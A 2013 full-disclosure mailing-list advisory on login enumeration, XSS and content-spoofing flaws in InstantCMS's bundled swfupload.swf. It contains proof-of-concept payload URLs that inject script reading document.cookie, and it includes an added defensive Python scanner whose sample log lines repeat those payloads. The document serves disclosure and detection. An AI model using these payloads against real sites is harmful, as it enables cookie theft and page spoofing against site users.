
List:       full-disclosure
Subject:    [Full-disclosure] Multiple vulnerabilities in InstantCMS
From:       "MustLive" <mustlive () websecurity ! com ! ua>
Date:       2013-09-25 18:13:45
Message-ID: 006d01ceba1b$090f6410$9b7a6fd5 () pc



Hello 3APA3A!


These are Login Enumeration, Cross-Site Scripting and Content Spoofing vulnerabilities in InstantCMS.

-------------------------
Affected products:
-------------------------

InstantCMS 1.10.2 and previous versions are vulnerable.

-------------------------
Affected vendors:
-------------------------

InstantSoft
http://www.instantcms.ru

----------
Details:
----------

Login Enumeration (WASC-42):

http://site/users/login

It's possible to reveal logins via users' profiles. Logins of the users are also shown in many sections of the site (on the users page and others), because the developers don't care about leakage of users' logins. In the next advisory about InstantCMS I'll give more examples of such vulnerabilities.

Cross-Site Scripting (WASC-08):

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//


http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E


Content Spoofing (WASC-12):

http://site/includes/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E


http://site/includes/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif


------------
Timeline:
------------ 

In November 2012 and March 2013 I disclosed and wrote to the lists about vulnerabilities in SWFUpload. Everyone who wanted to has fixed these holes, but not the developers of InstantCMS.

2013.07.14 - found multiple vulnerabilities in InstantCMS 1.10.1.
2013.07.19 - informed developers about first part of the vulnerabilities. Ignored.
2013.07.30 - announced at my site.
2013.07.31 - informed developers about another part of the vulnerabilities. Answered, but refused to fix.
2013.08.02 - reminded developers about the first letter with holes and explained why to fix them.
2013.08.02 - developers released InstantCMS 1.10.2 without fixing any of the reported vulnerabilities. All above-mentioned holes work in it.
2013.09.24 - disclosed at my site (http://websecurity.com.ua/6681/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
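A defender-side check for the swfupload.swf requests listed in the advisory above, added here as an example; it is not code from the advisory, from InstantCMS or from SWFUpload. It scans constructed Common Log Format access-log lines for requests that pass script or markup into the movieName/buttonText parameters or point buttonImageURL off-site. The log lines, the own host name "site", the parameter rules and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# swfupload.swf parameters the advisory shows being abused (WASC-08 / WASC-12).
WATCHED = {"movieName", "buttonText", "buttonImageURL"}
SAFE_IDENT = re.compile(r"^[A-Za-z0-9_.-]*$")          # movieName should be a plain identifier
MARKUP = re.compile(r"[<>\"'(){};]|javascript:", re.I)  # buttonText should be a plain label
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) \S+" (?P<status>\d+)')

# Constructed access-log lines (assumption): the four request URLs from the advisory plus benign traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Sep/2013:18:13:45 +0000] "GET /includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// HTTP/1.1" 200 9712',
    '198.51.100.7 - - [25/Sep/2013:18:13:46 +0000] "GET /includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E HTTP/1.1" 200 9712',
    '198.51.100.7 - - [25/Sep/2013:18:13:47 +0000] "GET /includes/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E HTTP/1.1" 200 9712',
    '198.51.100.7 - - [25/Sep/2013:18:13:48 +0000] "GET /includes/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif HTTP/1.1" 200 9712',
    '192.0.2.10 - - [25/Sep/2013:18:14:02 +0000] "GET /includes/swfupload/swfupload.swf?movieName=SWFUpload_0&buttonText=Upload&buttonImageURL=/images/upload.png HTTP/1.1" 200 9712',
    '192.0.2.10 - - [25/Sep/2013:18:14:03 +0000] "GET /users/login HTTP/1.1" 200 4120',
]

def classify_request(url, own_hosts=("site",)):
    """Return (param, reason) findings for one request URL; empty unless it is a suspicious swfupload.swf call."""
    parts = urlsplit(url)
    if not parts.path.endswith("/swfupload/swfupload.swf"):
        return []
    findings = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED:
            continue
        for value in values:
            value = unquote(value)  # second decode catches double-encoded payloads
            if name == "movieName" and not SAFE_IDENT.match(value):
                findings.append((name, "script injected via movieName (WASC-08)"))
            elif name == "buttonText" and MARKUP.search(value):
                findings.append((name, "markup or script in buttonText (WASC-08 / WASC-12)"))
            elif name == "buttonImageURL":
                host = urlsplit(value).hostname
                if host and host not in own_hosts:  # only our own hosts may serve the button image
                    findings.append((name, "off-site buttonImageURL (content spoofing, WASC-12)"))
    return findings

def scan_log(lines, own_hosts=("site",)):
    """Return (ip, url, findings) for every log line carrying a suspicious swfupload.swf request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            findings = classify_request(m.group("url"), own_hosts)
            if findings:
                hits.append((m.group("ip"), m.group("url"), findings))
    return hits

if __name__ == "__main__":
    for ip, url, findings in scan_log(SAMPLE_LOG):
        print(ip, url.split("?", 1)[0], findings)
```

The same rules can be applied at the web server as a request filter, or the unused swfupload.swf can simply be removed from the web root, which closes all four URLs at once.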


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
